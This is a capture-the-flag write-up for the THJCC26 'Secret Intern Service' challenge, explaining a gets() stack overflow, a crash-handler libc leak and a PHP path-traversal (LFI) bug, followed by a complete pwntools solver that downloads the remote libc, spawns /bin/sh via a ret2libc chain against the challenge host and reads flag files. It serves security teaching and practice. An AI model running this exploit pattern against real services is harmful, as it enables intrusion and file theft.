Writeup

Secret Intern Service — Writeup

0xAsta

February 21, 2026

3 min read

pwn linux ret2libc lfi

THJCC26 CTF - Secret Intern Service — Writeup

This writeup details the solution for THJCC26 CTF - Secret Intern Service. The pwn binary looks straightforward at first, but remote exploitation depends on Secret File Viewer to recover the exact libc used by the service.

Summary

The service has a classic stack overflow in add_message() via gets(msg.content). Under normal mitigations (PIE, NX, no canary), a ret2libc chain is viable, but remote libc offsets are required.

A helpful bug in the crash path leaks a libc address:

crash_handler() prints Disconnect handler: %p
login_agent.on_disconnect is initialized to puts
so the printed pointer is effectively a runtime leak of puts in libc

The missing piece is libc identification. The companion Secret File Viewer has an LFI in download.php?file=..., which lets us read /run.sh and /libc.so.6. With that libc, offsets are exact and ret2libc becomes reliable.

Key Code Snippets

Vulnerable overflow in the service:

1
void add_message(int user_id){
2
    Message msg;
3
    msg.user_id = user_id;
4
    printf("Enter your message: ");
5
    getchar();
6
    gets(msg.content);
7
    printf("Message added for user %d: %s\n\n", msg.user_id, msg.content);
8
}

Crash leak primitive:

1
fprintf(stderr, "Disconnect handler: %p\n", (void *)login_agent.on_disconnect);

LFI in Secret File Viewer:

1
$file = $_GET['file'];
2
$filename = basename($file);
3
header('Content-Length: ' . filesize($file));
4
readfile($file);

Analysis

Components

1) Secret Intern Service (port 30001)

Stack overflow in gets
PIE + NX + no stack canary
Crash handler recursively calls main() and leaks a function pointer from libc

2) Secret File Viewer (port 30000)

LFI in download.php?file=...
Readable files include system paths and app scripts
/run.sh reveals that /libc.so.6 is copied into system libc path in this environment

Why this works

First overflow triggers crash and leaks puts address from libc.
LFI gives the exact remote libc.so.6 binary.
Compute libc_base = leaked_puts - libc.symbols['puts'].
Second overflow builds ret2libc chain:
- pop rdi; ret
- pointer to "/bin/sh" in libc
- system
Send cat /flag over the spawned shell.

Exploitation and Flag Recovery

Step 1: Obtain remote libc via LFI

Query Secret File Viewer:

/download.php?file=/run.sh (to confirm libc manipulation)
/download.php?file=/libc.so.6 (download exact libc)

Step 2: Leak libc pointer from crash handler

Login once
Choose Add a message
Send oversized input (e.g. 400 bytes)
Parse Disconnect handler: 0x...

Step 3: Build and trigger ret2libc

Re-login after restart
Overflow offset to RIP: 272
Chain: pop rdi; ret -> "/bin/sh" -> system
Send cat /flag /flag.txt /home/chal/flag* 2>/dev/null

Solver

1
from pwn import *
2
import re
3
import socket
4

5
HOST = "chal.thjcc.org"
6
CONNECT_HOST = "23.146.248.121"
7
PORT_WEB = 30000
8
PORT_PWN = 30001
9
LIBC_PATH = "./remote_libc.so.6"
10

11

12
def http_get_raw(path: str) -> bytes:
13
    s = socket.create_connection((CONNECT_HOST, PORT_WEB), timeout=8)
14
    req = (
15
        f"GET {path} HTTP/1.1\r\n"
16
        f"Host: {HOST}\r\n"
17
        "Connection: close\r\n\r\n"
18
    ).encode()
19
    s.sendall(req)
20
    data = b""
21
    while True:
22
        chunk = s.recv(65536)
23
        if not chunk:
24
            break
25
        data += chunk
26
    s.close()
27
    return data
28

29

30
def download_libc():
31
    raw = http_get_raw("/download.php?file=/libc.so.6")
32
    body = raw.split(b"\r\n\r\n", 1)[1]
33
    with open(LIBC_PATH, "wb") as f:
34
        f.write(body)
35

36

37
def solve():
38
    context.log_level = "info"
39

40
    download_libc()
41
    libc = ELF(LIBC_PATH, checksec=False)
42
    pop_rdi = ROP(libc).find_gadget(["pop rdi", "ret"]).address
43
    binsh_off = next(libc.search(b"/bin/sh\x00"))
44
    system_off = libc.symbols["system"]
45
    puts_off = libc.symbols["puts"]
46

47
    p = remote(CONNECT_HOST, PORT_PWN)
48

49
    def login(user=b"a", pw=b"b"):
50
        p.sendlineafter(b"Username: ", user)
51
        p.sendlineafter(b"Password: ", pw)
52

53
    # Stage 1: force crash to leak puts address from crash_handler
54
    login()
55
    p.sendlineafter(b"> ", b"1")
56
    p.sendlineafter(b"Enter your message: ", b"A" * 400)
57
    leak_blob = p.recvuntil(b"System Restarting...", timeout=3)
58
    m = re.search(rb"Disconnect handler: (0x[0-9a-fA-F]+)", leak_blob)
59
    if not m:
60
        raise RuntimeError("failed to parse leak")
61
    puts_leak = int(m.group(1), 16)
62
    libc_base = puts_leak - puts_off
63
    log.success(f"puts leak: {hex(puts_leak)}")
64
    log.info(f"libc base: {hex(libc_base)}")
65

66
    # Stage 2: ret2libc -> system('/bin/sh')
67
    login(b"c", b"d")
68
    payload = b"A" * 272
69
    payload += p64(libc_base + pop_rdi)
70
    payload += p64(libc_base + binsh_off)
71
    payload += p64(libc_base + system_off)
72
    p.sendlineafter(b"> ", b"1")
73
    p.sendlineafter(b"Enter your message: ", payload)
74

75
    p.sendline(b"cat /flag /flag.txt /home/chal/flag* 2>/dev/null")
76
    print(p.recvall(timeout=2).decode("latin1", "ignore"))
77

78

79
if __name__ == "__main__":
80
    solve()

Final Result

THJCC{w3_d13_1n_7h3_d4rk_50-y0u_m4y_l1v3_1n_7h3_l16h7}